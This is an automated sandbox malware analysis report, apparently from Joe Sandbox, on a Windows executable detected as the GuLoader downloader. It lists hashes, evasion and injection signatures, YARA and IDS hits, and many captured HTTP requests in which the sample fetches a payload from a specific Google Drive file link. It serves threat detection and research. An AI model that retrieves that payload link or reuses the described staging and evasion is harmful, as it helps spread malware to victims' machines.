Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QNuQ5e175D.exe

Overview

General Information

Sample name:QNuQ5e175D.exe
renamed because original name is a hash value
Original sample name:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa.exe
Analysis ID:1588755
MD5:9bb2cdb8508ee2255a35ecec43462a48
SHA1:c7465e8b0a3ae61b23520752afbb8bf89a3cecdd
SHA256:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa
Tags:exesigneduser-adrian__luca
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • QNuQ5e175D.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\QNuQ5e175D.exe" MD5: 9BB2CDB8508EE2255A35ECEC43462A48)
    • QNuQ5e175D.exe (PID: 7776 cmdline: "C:\Users\user\Desktop\QNuQ5e175D.exe" MD5: 9BB2CDB8508EE2255A35ECEC43462A48)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3567436763.00000000017EC000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.1944070834.000000000456C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T05:13:09.535463+010028032702Potentially Bad Traffic192.168.2.449736142.250.184.206443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: QNuQ5e175D.exeReversingLabs: Detection: 44%
      Source: QNuQ5e175D.exeVirustotal: Detection: 63%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: QNuQ5e175D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49805 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49886 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49968 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50016 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50018 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:50021 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50024 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50026 version: TLS 1.2
      Source: QNuQ5e175D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_00402930 FindFirstFileW,4_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_004068D4 FindFirstFileW,FindClose,4_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C83
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.184.206:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
